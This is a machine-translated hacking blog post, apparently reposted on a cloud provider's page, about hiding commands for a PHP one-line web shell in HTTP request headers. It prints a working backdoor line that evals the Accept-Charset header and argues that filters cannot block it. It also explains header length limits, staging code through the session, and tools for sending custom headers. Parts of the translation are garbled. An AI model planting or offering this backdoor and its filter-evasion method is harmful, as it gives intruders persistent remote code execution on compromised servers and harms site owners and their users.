An update idea about a single-sentence Trojan

Source: Internet
Author: User

This article involves web, injection, and one-sentence Trojan Horse. Many people think that being a script kiddie is a bit inferior to other websites. more hackers with old names are not involved in this technology .... haha
In fact, I personally think so, but I am a young man with an impetuous mind and a new liking. In addition, I live in this age of new things, and I need to be exposed to these bad things .. fortunately, this research is limited to understanding goals. it's not as crazy as it is...
Oh, there are too many nonsense. opera's blog does not have the abstract function, so it is better to be brief as much as possible if there are no miscellaneous ....

What is a trojan in one sentence ....
If a traditional one-sentence Trojan encounters a just upgrade on this machine or is installed with a filtering system due to intrusion, the one-sentence Trojan on this machine is basically disabled, at this time, the code data of the intruders cannot be uploaded to a single-sentence Trojan and cannot be run. This function is no longer available.
However, I don't know why we haven't found a place for so long. In fact, there are always loopholes. If we use a trojan for a sentence, the future of a Trojan will be very bright. any filtering system cannot block the purpose of your execution data, even if its get, post, cookie, xml, and rss are strictly filtered. even, it is difficult for this method to have effective prevention measures. this method is described below. it is actually very simple.

Speaking of discovering this method, there is at least two years. Sometimes I forget it because I didn't have time.
First look at a piece of code:

<?
// $ _ SERVER can be the following:
// HTTP_ACCEPT
// HTTP_ACCEPT_CHARSET
// HTTP_ACCEPT_ENCODING
// HTTP_ACCEPT_LANGUAGE
// HTTP_CONNECTION
// HTTP_HOST
// HTTP_REFERER
// HTTP_USER_AGENT
?>

<? Eval ($ _ SERVER ["HTTP_ACCEPT_CHARSET"]);?>

If this information is released, many people will understand it. It is to use the information in the http header to attach your data and use it as a parameter for Trojan execution.
However, people who understand this will certainly have the following questions:
1. Why is it hard to be prevented.
Because the http header information contains a wide range of illegal characters, such as *, comma, period, single quotes, dual-silver signs, Parentheses, and so on, if the anti-injection program is used for the http header, almost all normal data will be prevented. therefore, it is impossible to filter http. It requires a very complicated method. I believe no one will develop such software.
2. Is the http header long enough? The code to be executed will usually be long.
I have tested that iis and apache have a limit on the length of http header data, which is about 10,000-15,000 characters, that is, 15 kb, so long, I want to upload a simple statement that is more than enough. Besides, if you encounter a server with a limit of more than 100 characters, you can incrementally write the statement to the session first, then extract and execute from the session.
3. How to use it?

In fact, it is best to write a simple code. The attachment in this article contains a c source code (gethttp. c) It is a simple custom http header that you can use to upload your data.

You can also use the following tool: accessdriver.

After running, press f4, click the extras tool page, click the http debugger sub-page under the page, enter your one-sentence Trojan page in the http address on the page, and select get in mode, click the header data at the top of the mode and an input box will appear. This is where you can customize the http header. I don't need to talk about it in other places. You will understand it at a glance, this tool is very useful.

It seems like there are a lot of things. Maybe I am talking about it very easily. It's better to be simple, isn't it.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.